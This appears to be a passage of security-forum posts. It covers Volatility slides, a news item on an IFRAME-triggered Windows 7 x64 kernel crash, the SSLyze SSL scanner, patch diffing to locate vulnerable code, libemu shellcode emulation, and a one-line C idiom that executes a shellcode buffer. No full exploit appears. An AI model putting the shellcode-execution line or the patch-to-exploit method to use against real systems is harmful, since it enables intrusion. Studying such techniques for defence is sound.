  - Windows 2008 Server SP 1, 2
  - Windows 7 SP 0, 1
Download: http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf
Source: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing
-
A simple HTML tag will crash 64-bit Windows 7 0-day leaves kernel in the wrong iframe of mind By John Leyden An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash. The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns. Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure. Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death. The offending script is just an IFRAME tag with an overly large height attribute. Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine. Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7. A video of the Safari-triggered crash along with the HTML PoC can be . Other exploit scenarios might also be possible. Demo: Source: A simple HTML tag will crash 64-bit Windows 7 • The Register More info: http://www.pcworld.com/businesscenter/article/246767/new_zeroday_vulnerability_in_windows_7_64bit_may_allow_remote_code_execution.html
-
SSLyze: A Fast and Full-Featured SSL Scanner!
by Mayuresh on December 21, 2011

When we wrote the "list of SSL scanners for penetration testers" post, in August this year, little did we know that we would have to update it this soon. We have since updated the list with SSLyze, a fast and full-featured SSL scanner. It is brought to us by the iSEC Partners. SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. This open source, cross-platform tool will help you with analyzing the configuration of SSL servers and with identifying mis-configurations such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings.

Features of SSLyze:
- Insecure renegotiation testing
- Scanning for weak strength ciphers
- Checking for SSLv2, SSLv3 and TLSv1 versions
- Server certificate information dump and basic validation
- Session resumption capabilities and actual resumption rate measurement
- Support for client certificate authentication
- Simultaneous scanning of multiple servers, versions and ciphers

For example, SSLyze can help users identify server configurations vulnerable to THC's recently released SSL DOS attack, by checking the server's support for client-initiated re-negotiations. As we have already mentioned, it is cross-platform. It supports 64-bit and 32-bit Windows and Linux operating systems.

All it needs is the following sets of packages:
- Windows: Python 2.6 or 2.7 and OpenSSL 1.0.0c
- Linux: Python 2.6 or 2.7 and OpenSSL 0.9.8+

Install SSLyze:
  # yum install python26 openssl
  # wget http://sslyze.googlecode.com/files/sslyze-0.3_src.zip
  # unzip sslyze-0.3_src.zip
  # cd sslyze-0.3_src

SSLyze usage:
  $ python sslyze.py [options] www.target1.com www.target2.com:443

It supports the following options to provide granular control:
- Regular Scan "--regular": Performs a regular scan. It's a shortcut for --sslv2 --sslv3 --tlsv1 --reneg --resum --certinfo=basic.
- OpenSSL Cipher Suites "--sslv2", "--sslv3", "--tlsv1": Lists the SSL 2.0 / SSL 3.0 / TLS 1.0 OpenSSL cipher suites supported by the server.
- Session Renegotiation "--reneg": Checks whether the server is vulnerable to insecure renegotiation.
- Session Resumption "--resum": Tests the server for session resumption support, using both session IDs and TLS session tickets (RFC 5077).
- Session Resumption Rate "--resum_rate": Estimates the average rate of successful session resumptions by performing 100 session resumptions.
- Server Certificate "--certinfo=basic": Verifies the server's certificate validity against Mozilla's trusted root store, and prints relevant fields of the certificate.

Additional options providing client certificate support and connection timeout variables are also available.

Download SSLyze:
SSLyze v0.3 – sslyze-0.3_src.zip – Downloads - sslyze - Fast and Full-Featured SSL Scanner - Google Project Hosting

Source: SSLyze: A Fast and Full-Featured SSL Scanner! — PenTestIT
-
Reversing Microsoft patches to reveal vulnerable code
Harsimran Walia
Computer Security Enthusiast

The paper would try to reveal the vulnerable code for a particular disclosed vulnerability, which is the first and foremost step for making an undisclosed exploit and for patch verification. The process used herein could be used to create vulnerability-based signatures, which are far better than exploit signatures. A vulnerability signature is a superset of all the inputs satisfying a particular vulnerability condition, whereas an exploit-based signature would only cater to one type of input satisfying that vulnerability condition.

This paper would try to pinpoint the vulnerable code and the files in Microsoft products by reverse engineering the Microsoft patches. The method used would be to take a binary difference of the file which was patched, taken at two different instances: one is the most recent file before patching and the second is after applying the patch. Finding the two files is in itself another problem. Windows now releases two different versions of patches: GDR (General Distribution), which contains only security-related updates, and QFE (Quick Fix Engineering) or LDR (Limited Distribution Release), which has both security-related and functional updates. The problem addressed is that the versions of the two files to be compared should match, that is, either both should be GDR or both LDR. The file after patching can be obtained by extracting the patch of the considered vulnerability. The second file to be compared, with a version matching the first one, could be extracted from some other vulnerability patch addressing an issue with the same software disclosed just before the vulnerability considered. The process of extracting files from patches differs in Vista and Windows 7 from the traditional way used in Windows XP.

After obtaining the correct files to be compared, the next step would be to get a binary difference between the files, which can be done very easily and effectively with the use of a tool called DarunGrim. The tool provides a well-illustrated difference between the subroutines in terms of percentage match between them. Subroutines from both files can be viewed in graph mode and can be compared to find the vulnerability. The change in the code is done to fix that particular vulnerability, which may be the removal of a piece of code and the addition of another. Another problem that arises at this point is that compiler optimizations happen every time code is compiled, so if both files are compiled with different compilers or compiler versions, they would have different compiler optimizations and that would also show up as a change in code. Simple instruction reordering keeps happening over different releases, which gives rise to another problem: when only the instructions are reordered, it would still show up as changed code.

The code change in one of the several functions in the file before applying the patch would be the vulnerable code. From here the knowledge of the reverse engineer would come into play, as to how effectively and quickly he can find the vulnerability from the code shown as being changed from the previous file. Until now the process used was static analysis, but from here onwards dynamic analysis would be used, as breakpoints could be set at these changed functions and the software run. When a breakpoint is hit we can check in which of the functions user input is being dealt with. All this information can then be used to write an exploit. This process of reversing the patch and finding the details about the vulnerability would definitely help in creating vulnerability signatures.

Download: http://nullcon.net/nullcon2011presentation/harsimranwalia_nullcon.pdf
-
libemu – x86 Shellcode Emulation

libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion detection/prevention systems and honeypots.

libemu supports:
- Executing x86 instructions
  - Reading x86 binary code
  - Register emulation
  - Basic FPU emulation
- Shellcode execution
  - Shellcode detection using GetPC heuristics
  - Static analysis
  - Binary backwards traversal
- Win32 API hooking

With libemu one can:
- Detect shellcodes
- Execute the shellcodes
- Profile shellcode behaviour

Download: http://sourceforge.net/projects/nepenthes/files/libemu%20development/0.1.0/

Source and info: libemu – x86 Shellcode Emulation
-
It's useful when you come across some uglier syntax and are too lazy to rearrange the code in order to understand it.

(*(void(*)()) SC)();
-
Great, something in Romanian... Something in English: MEGAUPLOAD - The leading online storage and file delivery service
-
I'm no expert, but I think you (necessarily) had to jailbreak it.
-
I recommend you focus on a single language, at most 2: one programming language - C++ - and one scripting/web language - PHP. But C# is also useful if you want to build something quickly and easily. Welcome.
-
Wannabe e-mail address: h4ck3r@expect-us.net
Contact form without CAPTCHA, probably vulnerable to CRLF: Contact
1337 grammar: "Tutorialz"
Pathetic menu made with who knows what junk: "Gooey Menu script"
The design amounts to the kind of tables I used to make in 9th grade.
In short: crap.